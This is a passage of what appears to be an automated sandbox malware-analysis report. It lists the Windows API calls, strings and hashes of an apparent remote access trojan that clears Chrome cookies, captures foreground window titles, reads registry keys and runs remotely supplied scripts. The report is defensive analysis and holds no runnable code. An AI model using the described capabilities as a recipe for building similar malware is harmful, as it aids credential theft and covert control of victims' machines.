                              • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 004056F6
                              • UserProfile, xrefs: 004056FC
                              • [Chrome Cookies found, cleared!], xrefs: 00405791
                              • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                              APIs
                              • GetForegroundWindow.USER32(76F90F00,00415940,?,?,?,?,?,?,?,?,0040E240), ref: 0040F4AB
                              • GetWindowTextLengthA.USER32(00000000), ref: 0040F4B4
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?,?,?,?,?,?,?,?,?,0040E240), ref: 0040F4CD
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,0040E240), ref: 0040F4D6
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040E240), ref: 0040F4E0
                              • GetWindowTextA.USER32(00000000,00000000), ref: 0040F4E8
                              • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,?,?,?,?,?,?,0040E240), ref: 0040F4F7
                              • ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040E240), ref: 0040F501
                              • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040E240), ref: 0040F50B
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004108AC,?,00000000,?,?,?,?,?,?,?,?,0040E240), ref: 0040F522
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040E240), ref: 0040F531
                                • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFC4
                                • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFDB
                                • Part of subcall function 0040EFB5: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491), ref: 0040EFF1
                                • Part of subcall function 0040EFB5: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0040F00F
                                • Part of subcall function 0040EFB5: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F019
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F022
                                • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F037
                                • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F044
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F096
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F09F
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F0A8
                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(00000000,00000000,00000000), ref: 0040F562
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F58D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040E240), ref: 0040F596
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F5AB
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F5DC
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F5E5
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 004039D1
                                • Part of subcall function 0040F4A3: GetForegroundWindow.USER32(76F90F00,00415940,?,?,?,?,?,?,?,?,0040E240), ref: 0040F4AB
                                • Part of subcall function 0040F4A3: GetWindowTextLengthA.USER32(00000000), ref: 0040F4B4
                                • Part of subcall function 0040F4A3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?,?,?,?,?,?,?,?,?,0040E240), ref: 0040F4CD
                                • Part of subcall function 0040F4A3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,0040E240), ref: 0040F4D6
                                • Part of subcall function 0040F4A3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040E240), ref: 0040F4E0
                                • Part of subcall function 0040F4A3: GetWindowTextA.USER32(00000000,00000000), ref: 0040F4E8
                                • Part of subcall function 0040F4A3: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,?,?,?,?,?,?,0040E240), ref: 0040F4F7
                                • Part of subcall function 0040F4A3: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040E240), ref: 0040F501
                                • Part of subcall function 0040F4A3: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040E240), ref: 0040F50B
                                • Part of subcall function 0040F4A3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004108AC,?,00000000,?,?,?,?,?,?,?,?,0040E240), ref: 0040F522
                                • Part of subcall function 0040F4A3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040E240), ref: 0040F531
                                • Part of subcall function 0040F4A3: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(00000000,00000000,00000000), ref: 0040F562
                                • Part of subcall function 0040F4A3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F58D
                                • Part of subcall function 0040F4A3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040E240), ref: 0040F596
                              • Sleep.KERNEL32(000003E8), ref: 004039E8
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?, ]), ref: 004039FF
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[ ,00000000), ref: 00403A0F
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00403A1C
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00403A2B
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403A34
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403A3D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403A46
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00403A55
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00403A73
                              • Sleep.KERNEL32(000003E8), ref: 00403A8A
                              • String ID: [ $ ]
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,6A41AFB0), ref: 004083F4
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040BF72), ref: 004083FD
                              • GetDriveTypeA.KERNEL32(00000000,?,0000000A), ref: 00408415
                              • _itoa.MSVCRT ref: 0040841C
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,0000002D), ref: 00408432
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040843A
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00000000), ref: 00408449
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 00408456
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408462
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040846B
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408474
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040847D
                              • lstrlenA.KERNEL32(00000000), ref: 00408484
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040849A
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040BF72), ref: 004084A3
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040BF72), ref: 004084AC
                              APIs
                              • DefWindowProcA.USER32(?,00000401,?,?), ref: 0040FA1C
                              • GetCursorPos.USER32(?), ref: 0040FA47
                              • SetForegroundWindow.USER32(?), ref: 0040FA50
                              • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0040FA6B
                              • Shell_NotifyIconA.SHELL32(00000002,00415BB0), ref: 0040FABC
                              • ExitProcess.KERNEL32 ref: 0040FAC4
                              • CreatePopupMenu.USER32 ref: 0040FACC
                              • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0040FAE1
                              • String ID: Close
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040D3B6
                              • SetEvent.KERNEL32(?), ref: 0040D3BF
                              • CloseHandle.KERNEL32(?), ref: 0040D3C8
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00415268), ref: 0040D3D8
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040D3E7
                                • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFC4
                                • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFDB
                                • Part of subcall function 0040EFB5: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491), ref: 0040EFF1
                                • Part of subcall function 0040EFB5: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0040F00F
                                • Part of subcall function 0040EFB5: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F019
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F022
                                • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F037
                                • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F044
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F096
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F09F
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F0A8
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,00000000), ref: 0040D407
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,exec), ref: 0040D416
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D432
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D448
                                • Part of subcall function 0040D20D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004108CC,?,?,?,?), ref: 0040D228
                                • Part of subcall function 0040D20D: getenv.MSVCRT ref: 0040D234
                                • Part of subcall function 0040D20D: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?), ref: 0040D240
                                • Part of subcall function 0040D20D: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040D24D
                                • Part of subcall function 0040D20D: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D258
                                • Part of subcall function 0040D20D: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D261
                                • Part of subcall function 0040D20D: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000001), ref: 0040D26E
                                • Part of subcall function 0040D20D: ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 0040D27B
                                • Part of subcall function 0040D20D: ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040D287
                                • Part of subcall function 0040D20D: ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,?), ref: 0040D2A0
                                • Part of subcall function 0040D20D: ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040D2AD
                                • Part of subcall function 0040D20D: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040D2CC
                                • Part of subcall function 0040D20D: ShellExecuteExA.SHELL32(0000003C), ref: 0040D2E9
                                • Part of subcall function 0040D20D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(remscriptexecd,?), ref: 0040D30D
                                • Part of subcall function 0040D20D: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040D31F
                                • Part of subcall function 0040D20D: CloseHandle.KERNEL32(?), ref: 0040D328
                                • Part of subcall function 0040D20D: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040D331
                                • Part of subcall function 0040D20D: DeleteFileA.KERNEL32(00000000), ref: 0040D338
                                • Part of subcall function 0040D20D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(remscriptsuccess,?,?,?,?,?), ref: 0040D352
                                • Part of subcall function 0040D20D: ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?), ref: 0040D380
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D459
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D46A
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@$V01@@$D@1@@D@std@@@std@@V?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@D@2@@0@$CloseHandleHstd@@V12@$??0?$basic_ofstream@??4?$basic_string@??6std@@??8std@@?close@?$basic_ofstream@?find@?$basic_string@?is_open@?$basic_ofstream@?substr@?$basic_string@D?$basic_ofstream@D@2@@0@@D@std@@@0@DeleteEventExecuteFileObjectShellSingleV01@V10@V10@0@V10@@V?$basic_ostream@Waitgetenv
                              • String ID: exec
                              • API String ID: 1002160170-3144634053
                              • Opcode ID: 56fcbabcf975ea0c7de527fb19e0c164c1539da4d09a0a8bf085cf32e83460a5
                              • Instruction ID: 2a1242b9f6ee79d5d393efb9909d70216f0b734506a354a1a0805bdd98583fd6
                              • Opcode Fuzzy Hash: 56fcbabcf975ea0c7de527fb19e0c164c1539da4d09a0a8bf085cf32e83460a5
                              • Instruction Fuzzy Hash: 89213072910119ABCF04BBE5DC5E9EE7B78FF14305F004469F912A20E1EE785988CB99
                              APIs
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKLM,00415268,?,00409C86), ref: 004094F1
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKCU), ref: 00409509
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409561
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040956E
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@??8std@@D@2@@0@D@2@@std@@V?$basic_string@
                              • String ID: HKCC$HKCR$HKCU$HKLM$HKU
                              • API String ID: 2054586871-62392802
                              • Opcode ID: 1e8cfaee7e8edccd3cbd4cc1fc534f52dd70c70e2637a942119cbfc6a749a9cb
                              • Instruction ID: d777f3dda36179113423a7ed30754d26adfb0a2fc6db248441cd5d77bc2a580d
                              • Opcode Fuzzy Hash: 1e8cfaee7e8edccd3cbd4cc1fc534f52dd70c70e2637a942119cbfc6a749a9cb
                              • Instruction Fuzzy Hash: 0501C43B58422A73CE059AD5EC15AD927088B053A5F2000B7AA00F75D2CE7CDEC98BC9
                              APIs
                              • GetWindowTextW.USER32(?,?,0000012C), ref: 0040C90B
                              • IsWindowVisible.USER32(?), ref: 0040C914
                              • sprintf.MSVCRT ref: 0040C93C
                              • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0040C953
                                • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDE3
                                • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(004118A0,00000000,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDF4
                                • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDFD
                                • Part of subcall function 0040EDD3: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE0A
                                • Part of subcall function 0040EDD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE15
                                • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(hRA,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE34
                                • Part of subcall function 0040EDD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE3D
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,0041171C,?,00411728), ref: 0040C97B
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,00411728), ref: 0040C988
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,00411728), ref: 0040C995
                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,00411728), ref: 0040C9A3
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00411728), ref: 0040C9AC
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00411728), ref: 0040C9B5
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00411728), ref: 0040C9BE
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00411728), ref: 0040C9C7
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00411728), ref: 0040C9D0
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@2@@std@@G@std@@$??0?$basic_string@D@2@@0@Hstd@@V10@V?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@V01@@Window$D@1@@G@1@@TextV01@VisibleY?$basic_string@sprintf
                              • String ID:
                              • API String ID: 1029694555-0
                              • Opcode ID: d1a5efd950a48ac111f91248e106e01afb4cc1c703c408ec3dfb3afdd1bed23d
                              • Instruction ID: 4e002e25e0f648f437be034c291f2efbcbeefca2187121b50d5874a0224bd0e6
                              • Opcode Fuzzy Hash: d1a5efd950a48ac111f91248e106e01afb4cc1c703c408ec3dfb3afdd1bed23d
                              • Instruction Fuzzy Hash: 7621DA72D4010EABDF14ABA0EC8DDDE777DAB14308F008476F516A21A1EB7896898B58
                              APIs
                                • Part of subcall function 00408EF1: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,80000002), ref: 00408F12
                                • Part of subcall function 00408EF1: RegQueryValueExA.ADVAPI32(80000002,004075CB,00000000,00000000,?,00000400), ref: 00408F31
                                • Part of subcall function 00408EF1: RegCloseKey.ADVAPI32(80000002), ref: 00408F3A
                                • Part of subcall function 00408EF1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410668,?), ref: 00408F59
                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(.exe,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00407FB7,?), ref: 0040E5F6
                              • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,-00000004,?,?,?,?,?,?,?,?,?,?,?,?,00407FB7), ref: 0040E609
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00407FB7,?), ref: 0040E613
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00407FB7,?), ref: 0040E61C
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040E635
                                • Part of subcall function 0040EED4: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(?,00000000,6A41AFB0,?,?,0040E644,?), ref: 0040EEE3
